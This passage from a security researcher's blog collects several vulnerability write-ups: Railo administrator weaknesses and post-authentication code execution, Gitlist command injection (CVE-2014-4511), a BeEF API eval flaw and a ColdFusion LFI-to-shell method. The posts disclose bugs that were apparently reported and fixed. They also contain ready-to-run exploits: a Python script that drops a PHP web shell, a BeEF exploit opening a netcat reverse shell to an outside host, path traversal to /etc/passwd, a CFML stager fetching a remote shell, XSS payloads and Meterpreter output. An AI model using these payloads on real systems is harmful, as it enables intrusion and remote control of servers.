        return id;
    }

Here we invoke getId which, if null, calls down into an overloaded getId which takes a security key and a security token, along with a boolean (false) and some global securityKey value. Here’s the function in its entirety:

public static String getId(String key, String token,boolean addMacAddress,String defaultValue) {

    try {
        if(addMacAddress){// because this was new we could swutch to a new ecryption // FUTURE cold we get rid of the old one?
            return Hash.sha256(key+";"+token+":"+SystemUtil.getMacAddress());
        }
        return Md5.getDigestAsString(key+token);
    }
    catch (Throwable t) {
        return defaultValue;
    }
}

Our ID generation is becoming clear; it’s essentially the MD5 of key + token, the key being returned from getSecurityKey and the token coming from getSecurityToken. These functions are simply getters for private global variables in the ConfigImpl class, but tracking down their generation is fairly trivial. All state initialization takes place in ConfigWebFactory.java. Let’s first check out the security key:

private static void loadId(ConfigImpl config) {
        Resource res = config.getConfigDir().getRealResource("id");
        String securityKey = null;
        try {
            if (!res.exists()) {
                res.createNewFile();
                IOUtil.write(res, securityKey = UUIDGenerator.getInstance().generateRandomBasedUUID().toString(), SystemUtil.getCharset(), false);
            }
            else {
                securityKey = IOUtil.toString(res, SystemUtil.getCharset());
            }
        }

Okay, so our key is a randomly generated UUID from the safehaus library. This isn’t very likely to be guessed/brute-forced, but the value is written to a file in a consistent place. We’ll return to this.

The second value we need to calculate is the security token, which is set in ConfigImpl:

public String getSecurityToken() {
        if(securityToken==null){
            try {
                securityToken = Md5.getDigestAsString(getConfigDir().getAbsolutePath());
            }
            catch (IOException e) {
                return null;
            }
        }
        return securityToken;
    }

Gah! This is predictable/leaked! The token is simply the MD5 of our configuration directory, which in my case is C:\Documents and Settings\bryan\My Documents\Downloads\railo-express-4.0.4.001-jre-win32\webapps\www\WEB-INF\railo. So let’s see if this works.

We MD5 the directory (20132193c7031326cab946ef86be8c74), prefix this with the random UUID (securityKey), and MD5 the result to finally get:

$ echo -n "3ec59952-b5de-4502-b9d7-e680e5e2071820132193c7031326cab946ef86be8c74" | md5sum
a898c2525c001da402234da94f336d55  -

Ah-ha! Our session file will then be web-a898c2525c001da402234da94f336d55.cfm, which exactly lines up with what we’re seeing:
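The whole derivation fits in a few lines; a sketch mirroring the Java above:

import hashlib

def session_filename(security_key, config_dir, admin_type="web"):
    # securityToken = md5 of the config directory's absolute path
    token = hashlib.md5(config_dir).hexdigest()
    # id = md5(securityKey + securityToken), per ConfigImpl.getId()
    file_id = hashlib.md5(security_key + token).hexdigest()
    return "%s-%s.cfm" % (admin_type, file_id)

print session_filename(
    "3ec59952-b5de-4502-b9d7-e680e5e20718",
    "C:\\Documents and Settings\\bryan\\My Documents\\Downloads"
    "\\railo-express-4.0.4.001-jre-win32\\webapps\\www\\WEB-INF\\railo")
# -> web-a898c2525c001da402234da94f336d55.cfm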

I mentioned that the config directory is leaked; default Railo is pretty promiscuous:

As you can see, from this we can derive the base configuration directory and figure out one half of the session filename. We now turn our attention to figuring out exactly what the securityKey is; if we recall, this is a randomly generated UUID that is then written out to a file called id.

There are two options here; one, guess or predict it, or two, pull the file with an LFI. As alluded to in part one, we can set the error handler to any file on the system we want. As we’re in the mood to discuss post-authentication issues, we can harness this to fetch the required id file containing this UUID:

When we then access a non-existent page, we trigger the template and the system returns our file:

By combining these specific vectors and inherent weaknesses in the Railo architecture, we can obtain post-authentication RCE without forcing the server to connect back. This can be particularly useful when the Task Scheduler just isn’t an option. This vulnerability has been implemented into clusterd as an auxiliary module, and is available in the latest dev build (0.3.1). A quick example of this:

I mentioned briefly at the start of this post that there were “several” post-authentication RCE vulnerabilities. Yes. Several. The one documented above was fun to find and figure out, but there is another way that’s much cleaner. Railo has a function that allows administrators to set logging information, such as level and type and location. It also allows you to create your own logging handlers:

Here we’re building an HTML-layout log file that will append all ERROR logs to the file. And we notice we can configure the path and the title. And the log extension. Easy win. By modifying the path to /context/my_file.cfm and setting the title to <cfdump var="#session#"> we can execute arbitrary commands on the file system and obtain shell access. Oddly, the file is not created when you create the log, but only once you select Edit and then Submit. Here’s the HTML output that’s stuck into the file by default:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title><cfdump var="#session#"></title>
<style type="text/css">
<!--
body, table {font-family: arial,sans-serif; font-size: x-small;}
th {background: #336699; color: #FFFFFF; text-align: left;}
-->
</style>
</head>
<body bgcolor="#FFFFFF" topmargin="6" leftmargin="6">
<hr size="1" noshade>
Log session start time Mon Jun 30 23:06:17 MDT 2014<br>
<br>
<table cellspacing="0" cellpadding="4" border="1" bordercolor="#224466" width="100%">
<tr>
<th>Time</th>
<th>Thread</th>
<th>Level</th>
<th>Category</th>
<th>Message</th>
</tr>
</table>
<br>
</body></html>

Note our title contains the injected command. Here’s execution:

Using this method we can, again, inject a shell without requiring the use of any reverse connections, though that option is of course available with the help of the cfhttp tag.

Another fun post-authentication feature is the use of data sources. In Railo, you can craft a custom data source, which is a user-defined database abstraction that can be used as a filesystem. Here’s the definition of a MySQL data source:

With this defined, we can set all client session data to be stored in the database, allowing us to harvest session ID’s and plaintext credentials (see part one). Once the session storage is set to the created database, a new table will be created (cf_session_data) that will contain all relevant session information, including symmetrically-encrypted passwords.

Part three and four of this series will begin to dive into the good stuff, where we’ll discuss several pre-authentication vulnerabilities that we can use to obtain credentials and remote code execution on a Railo host.

gitlist - commit to rce

29 June 2014 at 22:00

Gitlist is a fantastic repository viewer for Git; it’s essentially your own private Github without all the social networking and glitzy features. I’ve got a private Gitlist that I run locally, as well as a professional instance for hosting internal projects. Last year I noticed a bug listed on their Github page that looked a lot like an exploitable hole:

Oops! sh: 1: Syntax error: EOF in backquote substitution

I commented on its exploitability at the time, and though the hole appears to be closed, the issue still remains. I returned to this during an install of Gitlist and decided to see if there were any other bugs in the application and, as it turns out, there are a few. I discovered a handful of bugs during my short hunt that I’ll document here, including one anonymous remote code execution vulnerability that’s quite trivial to pop. These bugs were reported to the developers and CVE-2014-4511 was assigned. These issues were fixed in version 0.5.0.

The first bug is actually more of a vulnerability in a library Gitlist uses, Gitter (same developers). Gitter allows developers to interact with Git repositories using Object-Oriented Programming (OOP). During a quick once-over of the code, I noticed the library shelled out quite a few times, and one in particular stood out to me:

$hash = $this->getClient()->run($this, "log --pretty=\"%T\" --max-count=1 $branch");

This can be found in Repository.php of the Gitter library, and is invoked from TreeController.php in Gitlist. As you can imagine, there is no sanitization on the $branch variable. This essentially means that anyone with commit access to the repository can create a malicious branch name (locally or remotely) and end up executing arbitrary commands on the server.

The tricky part comes with the branch name; git actually has a couple restrictions on what can and cannot be part of a branch name. This is all defined and checked inside of refs.c, and the rules are simply defined as (starting at line 33):

  1. Cannot begin with .
  2. Cannot contain a double dot (..)
  3. Cannot contain ASCII control characters or any of ?, [, ], ~, ^, :
  4. Cannot end with /
  5. Cannot end with .lock
  6. Cannot contain a backslash
  7. Cannot contain a space

With these restrictions in mind, we can begin crafting our payload.

My first thought was, because Gitlist is written in PHP, to drop a web shell. To do so we must print our payload out to a file in a location accessible to the web root. As it so happens, we have just the spot to do it. According to INSTALL.md, the following is required:

cd /var/www/gitlist
mkdir cache
chmod 777 cache

This is perfect; we have a reliable location with 777 permissions, and it’s accessible from the web root (/gitlist/cache/my_shell.php). The second step is to come up with a payload that adheres to the Git branch rules while still giving us a shell. What I came up with is as follows:

# git checkout -b "|echo\$IFS\"PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg==\"|base64\$IFS-d>/var/www/gitlist/cache/x"

In order to inject PHP, we need the <? and ?> headers, so we need to encode our PHP payload. We use the $IFS environment variable (Internal Field Separator) to stand in for our spaces, echo the base64’d shell into base64 -d for decoding, and pipe the result into our payload location.
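Generating such a branch name for an arbitrary payload is simple enough; a short sketch (the cache path matches the install layout above):

import base64

def evil_branch(php, cache="/var/www/gitlist/cache"):
    # base64 the PHP so the branch name avoids spaces, quotes, and <> chars
    blob = base64.b64encode(php)
    # $IFS stands in for the spaces git forbids in branch names
    return '|echo$IFS"%s"|base64$IFS-d>%s/x' % (blob, cache)

print evil_branch("<?system($_REQUEST['x']);?>\n")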

And it works flawlessly.

You might say, “Hey, if you have commit access it’s game over,” but I’ve seen several instances where this is not the case. Commit access does not necessarily equate to shell access.

The second vulnerability I discovered was a trivial RCE, exploitable by anonymous users without any access. I first noticed the bug while browsing the source code, and ran into this:

$blames = $repository->getBlame("$branch -- \"$file\"");

Knowing how often they shell out, and the complete lack of input sanitization, I attempted to pop this by trivially evading the double quotes and injecting grave accents:

http://localhost/gitlist/my_repo.git/blame/master/""`whoami`

And what do you know?

Curiosity quickly overcame me, and I attempted another vector:

Faster my fingers flew:

It’s terrifyingly clear that everything is an RCE. I developed a rough PoC to drop a web shell on the system. A test run of this is below:

root@droot:~/exploits# python gitlist_rce.py http://192.168.1.67/gitlist/graymatter
[!] Using cache location /var/www/gitlist/cache
[!] Shell dropped; go hit http://192.168.1.67/gitlist/cache/x.php?cmd=ls
root@droot:~/exploits# curl http://192.168.1.67/gitlist/cache/x.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root@droot:~/exploits# 

I’ve also developed a Metasploit module for this issue, which I’ll be submitting a PR for soon. A run of it:

msf exploit(gitlist_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.6:4444 
[*] Injecting payload...
[*] Executing payload..
[*] Sending stage (39848 bytes) to 192.168.1.67
[*] Meterpreter session 9 opened (192.168.1.6:4444 -> 192.168.1.67:34241) at 2014-06-21 23:07:01 -0600

meterpreter > sysinfo
Computer    : bryan-VirtualBox
OS          : Linux bryan-VirtualBox 3.2.0-63-generic #95-Ubuntu SMP Thu May 15 23:06:36 UTC 2014 i686
Meterpreter : php/php
meterpreter > 

Source for the standalone Python exploit can be found below.

from commands import getoutput
import urllib
import sys

""" 
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
Date: 06/20/2014
Author: drone (@dronesec)
Vendor Homepage: http://gitlist.org/
Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz
Version: <= 0.4.0
Tested on: Debian 7
More information: 
cve: CVE-2014-4511
"""

if len(sys.argv) <= 1:
    print '%s: [url to git repo] {cache path}' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]
    sys.exit(1)

url = sys.argv[1]
url = url if url[-1] != '/' else url[:-1]

path = "/var/www/gitlist/cache"
if len(sys.argv) > 2:
    path = sys.argv[2]

print '[!] Using cache location %s' % path

# payload <?system($_GET['cmd']);?>
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="

# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)

out = getoutput("wget %s" % mpath)
if '500' in out:
    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
    print '[-] Failed to drop'
    print out

railo security - part one - intro

25 June 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

Railo is an open-source alternative to the popular ColdFusion application server, implementing a FOSSy CFML engine and application server. It emulates ColdFusion in a variety of ways, with many features coming straight from the CF world, along with several of its own unique features (clustered servers, a plugin architecture, etc.). In this four-part series, we’ll touch on how Railo, much like ColdFusion, can be used to gain access to a system or network of systems. I will also be examining several pre-authentication RCE vulnerabilities discovered in the platform during this audit. I’ll be pimping clusterd throughout to exemplify how it can help achieve some of these goals. These posts are the result of a combined effort between myself and Stephen Breen (@breenmachine).

I’ll preface this post with a quick rundown of what we’re working with; public versions of Railo run from 3.0 to 4.2, with 4.2.1 being the latest release as of posting. The code is also freely available on Github; most of this post’s code samples have been taken from the 4.2 branch or master. Hashes:

$ git branch
* master
$ git rev-parse master
694e8acf1a762431eab084da762a0abbe5290f49

And a quick rundown of the code:

$ cloc ./
    3689 text files.
    3571 unique files.                                          
     151 files ignored.

http://cloc.sourceforge.net v 1.60  T=7.74 s (452.6 files/s, 60622.4 lines/s)
---------------------------------------------------------------------------------
Language                       files          blank        comment           code
---------------------------------------------------------------------------------
Java                            2786          66639          69647         258015
ColdFusion                       315           5690           3089          35890
ColdFusion CFScript              352           4377            643          15856
XML                               22            526            563           5773
Javascript                        14             46            252            733
Ant                                4             38             70            176
DTD                                4            283            588            131
CSS                                5             52             16             77
HTML                               1              0              0              1
---------------------------------------------------------------------------------
SUM:                            3503          77651          74868         316652
---------------------------------------------------------------------------------

Railo has two separate administrative web interfaces: server and web. The two interfaces segregate functionality into these categories: managing the actual server, and managing the content served up by the server. Server is available at http://localhost:8888/railo-context/admin/server.cfm and web is available at http://localhost:8888/railo-context/admin/web.cfm. Both interfaces are configured with a single, shared password that is set AFTER the site has been initialized. That is, the first person to hit the web server gets to choose the password.

Authentication

As stated, authentication requires only a single password, but locks an IP address out if too many failed attempts are performed. The exact logic for this is as follows (web.cfm):

<cfif loginPause and StructKeyExists(application,'lastTryToLogin') and IsDate(application.lastTryToLogin) and DateDiff("s",application.lastTryToLogin,now()) LT loginPause>
        <cfset login_error="Login disabled until #lsDateFormat(DateAdd("s",loginPause,application.lastTryToLogin))# #lsTimeFormat(DateAdd("s",loginPause,application.lastTryToLogin),'hh:mm:ss')#">
    <cfelse>

A Remember Me For setting allows an authenticated session to last until logout or for a specified amount of time. In the event that a cookie is saved for X amount of time, Railo actually encrypts the user’s password and stores it as the authentication cookie. Here’s the implementation of this:

<cfcookie expires="#DateAdd(form.rememberMe,1,now())#" name="railo_admin_pw_#ad#" value="#Encrypt(form["login_password"&ad],cookieKey,"CFMX_COMPAT","hex")#">

That’s right; a static key, defined as <cfset cookieKey="sdfsdf789sdfsd">, is used as the key to the CFMX_COMPAT encryption algorithm for encrypting and storing the user’s password client-side. This is akin to simply base64’ing the password, as symmetric-key security is dependent upon the secrecy of this shared key.

To then verify authentication, the cookie is decrypted and compared to the current password (which is also known; more on this later):

<cfif not StructKeyExists(session,"password"&request.adminType) and StructKeyExists(cookie,'railo_admin_pw_#ad#')>
    <cfset fromCookie=true>
    <cftry>
        <cfset session["password"&ad]=Decrypt(cookie['railo_admin_pw_#ad#'],cookieKey,"CFMX_COMPAT","hex")>
        <cfcatch></cfcatch>
    </cftry>
</cfif>

For example, if my stored cookie was RAILO_ADMIN_PW_WEB=6802AABFAA87A7, we could decrypt this with a simple CFML page:

<cfset tmp=Decrypt("6802AABFAA87A7", "sdfsdf789sdfsd", "CFMX_COMPAT", "hex")>
<cfdump var="#tmp#">

This would dump my plaintext password (which, in this case, is “default”). This ups the ante with XSS, as we can essentially steal plaintext credentials via this vector. Our cookie is graciously set without HTTPOnly or Secure: Set-Cookie: RAILO_ADMIN_PW_WEB=6802AABFAA87A7;Path=/;Expires=Sun, 08-Mar-2015 06:42:31 GMT.

Another worthy mention is the fact that the plaintext password is stored in the session struct, as shown below:

<cfset session["password"&request.adminType]=form["login_password"&request.adminType]>

In order to dump this, however, we’d need to be able to write a CFM file (or code) within the context of web.cfm. As a test, I’ve placed a short CFM file on the host and set the error handler to invoke it. test.cfm:

<cfdump var="#session#">

We then set the template handler to this file:

If we now hit a non-existent page, /railo-context/xx.cfm for example, we’ll trigger the cfm and get our plaintext password:

XSS

XSS is now awesome, because we can fetch the server’s plaintext password. Is there XSS in Railo?

Submitting to a CFM with malicious arguments triggers an error and injects unsanitized input.

Post-authentication search:

Submitting malicious input into the search bar will effectively sanitize out greater than/less than signs, but not inside of the saved form. Injecting "></form><img src=x onerror=alert(document.cookie)> will, of course, pop-up the cookie.

How about stored XSS?

A malicious mapping will trigger whenever the page is loaded; the only caveat being that the path must start with a /, and you cannot use the script tag. Trivial to get around with any number of different tags.

Speaking of, let’s take a quick look at the sanitization routines. They’ve implemented their own routines inside of ScriptProtect.java, and it’s a very simple blacklist:

  public static final String[] invalids=new String[]{
        "object", "embed", "script", "applet", "meta", "iframe"
    };

They iterate over these values and perform a simple compare, and if a bad tag is found, they simply replace it:

if(compareTagName(tagName)) {
            if(sb==null) {
                sb=new StringBuffer();
                last=0;
            }
            sb.append(str.substring(last,index+1));
            sb.append("invalidTag");
            last=endIndex;
        }

It doesn’t take much to evade this filter, as I’ve already described.

CSRF kind of fits in here, so how about CSRF? Fortunately for users, and unfortunately for pentesters, there’s not much we can do. Although Railo does not enforce authentication for CFML/CFC pages, it does check read/write permissions on all accesses to the backend config file. This is configured in the Server interface:

In the above image, if Access Write was configured to open, any user could submit modifications to the back-end configuration, including password resets, task scheduling, and more. Though this is sufficiently locked down by default, this could provide a nice backdoor.

Deploying

Much like Coldfusion, Railo features a task scheduler that can be used to deploy shells. A run of this in clusterd can be seen below:

$ ./clusterd.py -i192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer task --usr-auth default

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-01 10:04PM] Started at 2014-05-01 10:04PM
 [2014-05-01 10:04PM] Servers' OS hinted at windows
 [2014-05-01 10:04PM] Fingerprinting host '192.168.1.219'
 [2014-05-01 10:04PM] Server hinted at 'railo'
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-05-01 10:04PM] Matched 3 fingerprints for service railo
 [2014-05-01 10:04PM]   Railo Server (version 4.1)
 [2014-05-01 10:04PM]   Railo Server Administrator (version 4.1)
 [2014-05-01 10:04PM]   Railo Web Administrator (version 4.1)
 [2014-05-01 10:04PM] Fingerprinting completed.
 [2014-05-01 10:04PM] This deployer (schedule_task) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-05-01 10:04PM] Preparing to deploy cmd.cfml..
 [2014-05-01 10:04PM] Creating scheduled task...
 [2014-05-01 10:04PM] Task cmd.cfml created, invoking...
 [2014-05-01 10:04PM] Waiting for remote server to download file [8s]]
 [2014-05-01 10:04PM] cmd.cfml deployed to /cmd.cfml
 [2014-05-01 10:04PM] Cleaning up...
 [2014-05-01 10:04PM] Finished at 2014-05-01 10:04PM

This works almost identically to the ColdFusion scheduler, and should not be surprising.

One feature Railo has that isn’t found in ColdFusion is the Extension, or Plugin, architecture; this allows custom extensions to run in the context of the Railo server and execute code and tags. These extensions do not have access to the cfadmin tag (without authentication, that is), but we really don’t need that for a simple web shell. In the event that the Railo server is configured to not allow outbound traffic (hence rendering the Task Scheduler useless), this could be harnessed instead.

Railo allows extensions to be uploaded directly to the server, found here:

Developing a plugin is sort of confusing and not exactly clear from their provided Github documentation; however, the simplest way to do this is to grab a pre-existing package and simply replace one of the functions with a shell.

That about wraps up part one of our dive into Railo security; the remaining three parts will focus on several different vulnerabilities in the Railo framework, and how they can be lassoed together for pre-authentication RCE.

rce in browser exploitation framework (BeEF)

14 May 2014 at 02:57

Let me preface this post by saying that this vulnerability is already fixed, and was caught pretty early during the development process. The vulnerability was originally introduced during a merge for the new DNS extension, and was promptly patched by antisnatchor on 03/02/2014. Although this vulnerability was caught fairly quickly, it still made it into the master branch. I post this only because I’ve seen too many penetration testers leaving their tools externally exposed, often with default credentials.

The vulnerability is a trivial one, but is capable of returning a reverse shell to an attacker. BeEF exposes a REST API for modules and scripts to use; useful for dumping statistics, pinging hooked browsers, and more. It’s quite powerful. This can be accessed by simply pinging http://127.0.0.1:3000/api/ and providing a valid token. This token is static across a single session, and can be obtained by sending a POST to http://127.0.0.1:3000/api/admin/login with appropriate credentials. Default credentials are beef:beef, and I don’t know many users that change this right away. It’s also of interest to note that the throttling code does not exist in the API login routine, so a brute force attack is possible here.
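Since nothing throttles the API login, brute force is a handful of lines; a minimal sketch, with the endpoint and JSON format lifted from the exploit script below:

import json
import requests

def brute_beef(ip, wordlist, user='beef'):
    url = 'http://%s:3000/api/admin/login' % ip
    headers = {'Content-Type': 'application/json; charset=UTF-8'}
    for pw in wordlist:
        data = {'username': user, 'password': pw}
        r = requests.post(url, headers=headers, data=json.dumps(data))
        if r.status_code == 200 and json.loads(r.content).get('success'):
            return pw, json.loads(r.content)['token']
    return None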

The vulnerability lies in one of the exposed API functions, /rule. The code for this was as follows:

# Adds a new DNS rule
        post '/rule' do
          begin
            body = JSON.parse(request.body.read)

            pattern = body['pattern']
            type = body['type']
            response = body['response']

            # Validate required JSON keys
            unless [pattern, type, response].include?(nil)
              # Determine whether 'pattern' is a String or Regexp
              begin

                pattern_test = eval pattern
                pattern = pattern_test if pattern_test.class == Regexp
   #             end
              rescue => e;
              end

The obvious flaw is the eval on user-provided data. We can exploit this by POSTing a new DNS rule with a malicious pattern:

import requests
import json
import sys

def fetch_default(ip):
    url = 'http://%s:3000/api/admin/login' % ip
    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'username' : 'beef', 'password' : 'beef' }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    if response.status_code == 200 and json.loads(response.content)['success']:
        return json.loads(response.content)['token']

try:
    ip = '192.168.1.6'

    if len(sys.argv) > 1:
        token = sys.argv[1]
    else:
        token = fetch_default(ip)

    if not token:
        print 'Could not get auth token'
        sys.exit(1)

    url = 'http://%s:3000/api/dns/rule?token=%s' % (ip, token)
    sploit = '%x(nc 192.168.1.97 4455 -e /bin/bash)'

    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'pattern' : sploit,
             'type' : 'A',
             'response' : [ '127.0.0.1' ]
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code
except Exception, e:
    print e

You could execute Ruby to grab a shell, but BeEF restricts some of the functions we can use (such as exec or system).

There’s also an instance of LFI, this time using the server API. /api/server/bind allows us to mount files at the root of the BeEF web server. The path defaults to the current path, but can be traversed out of:

def run_lfi(ip, token):
    url = 'http://%s:3000/api/server/bind?token=%s' % (ip, token)
    headers = { 'Content-Type' : 'application/json'}
    data = { 'mount' : "/tmp.txt",
             'local_file' : "/../../../etc/passwd"
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code

We can then hit our server at /tmp.txt for /etc/passwd. Though this appears to be intended behavior, and perhaps labeling it an LFI is a misnomer, it is still yet another example of why you should not expose these tools externally with default credentials. Default credentials are just bad, period. Stop it.

LFI to shell in Coldfusion 6-10

2 April 2014 at 21:10

ColdFusion has several very popular LFIs that are often used to fetch CF hashes, which can then be passed or cracked/reversed. A lesser-known use of these LFIs, one that I haven’t seen documented as of yet, is actually obtaining a shell. When you can’t crack or pass, what’s left?

The less-than-obvious solution is to exploit CFML’s parser, which acts much in the same way that PHP does when used in HTML. You can embed PHP into any HTML page, at any location, because of the way the PHP interpreter searches a document for executable code. This is the foundational basis of log poisoning. CFML acts in much the same way, and we can use these LFI’s to inject CFML and execute it on the remote system.

Let’s begin by first identifying the LFI; I’ll be using ColdFusion 8 as an example. CF8’s LFI lies in the locale parameter:

http://192.168.1.219:8500/CFIDE/administrator/enter.cfm?local=../../../../../../../../ColdFusion8\logs\application.log%00en

When exploited, this will dump the contents of application.log, a logging file that stores error messages.

We can write to this file by triggering an error, such as attempting to access a nonexistent CFML page. This log also fails to sanitize data, allowing us to inject any sort of characters we want, including CFML code.

The idea for this is to inject a simple stager payload that will then pull down and store our real payload; in this case, a web shell (something like fuze). The stager I came up with is as follows:

<cfhttp method='get' url='#ToString(ToBinary('aHR0cDovLzE5Mi4xNjguMS45Nzo4MDAwL2NtZC5jZm1s'))#' path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#' file='cmd.cfml'>

The cfhttp tag is used to execute an HTTP request for our real payload, the URL of which is base64’d to avoid some encoding issues with forward slashes. We then expand the local path to ../../ which drops us into wwwroot, which is the first directory accessible from the web server.
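Generating the stager for a different payload URL or path takes only a couple of lines; a sketch reproducing the tag above:

import base64

def make_stager(url, rel_path="../../", filename="cmd.cfml"):
    # base64 both values to dodge encoding issues (forward slashes, etc.)
    return ("<cfhttp method='get' url='#ToString(ToBinary('%s'))#' "
            "path='#ExpandPath(ToString(ToBinary('%s')))#' file='%s'>"
            % (base64.b64encode(url), base64.b64encode(rel_path), filename))

print make_stager("http://192.168.1.97:8000/cmd.cfml")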

Once the stager is injected, we only need to exploit the LFI to retrieve the log file and execute our CFML code:

Which we can then access from the root directory:

A quick run of this in clusterd:

$ ./clusterd.py -i 192.168.1.219 -a coldfusion -p8500 -v8 --deployer lfi_stager --deploy ./src/lib/resources/cmd.cfml 

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 5 platforms]

 [2014-04-02 11:28PM] Started at 2014-04-02 11:28PM
 [2014-04-02 11:28PM] Servers' OS hinted at windows
 [2014-04-02 11:28PM] Fingerprinting host '192.168.1.219'
 [2014-04-02 11:28PM] Server hinted at 'coldfusion'
 [2014-04-02 11:28PM] Checking coldfusion version 8.0 ColdFusion Manager...
 [2014-04-02 11:28PM] Matched 1 fingerprints for service coldfusion
 [2014-04-02 11:28PM]   ColdFusion Manager (version 8.0)
 [2014-04-02 11:28PM] Fingerprinting completed.
 [2014-04-02 11:28PM] Injecting stager...
 [2014-04-02 11:28PM] Waiting for remote server to download file [7s]]
 [2014-04-02 11:28PM] cmd.cfml deployed at /cmd.cfml
 [2014-04-02 11:28PM] Finished at 2014-04-02 11:28PM

The downside to this method is the remnants left in a log file, which cannot be purged unless the CF server is shut down (except in CF10). It also means that the CFML file, if using the web shell, will be hanging around the filesystem. An alternative is to inject a web shell that exists on-demand; that is, it checks whether an argument is provided to the LFI and only parses and executes then.

A working deployer for this can be found in the latest release of clusterd (v0.2.1). It is also worth noting that this method is applicable to other CFML engines; details on that, and a working proof of concept, in the near future.
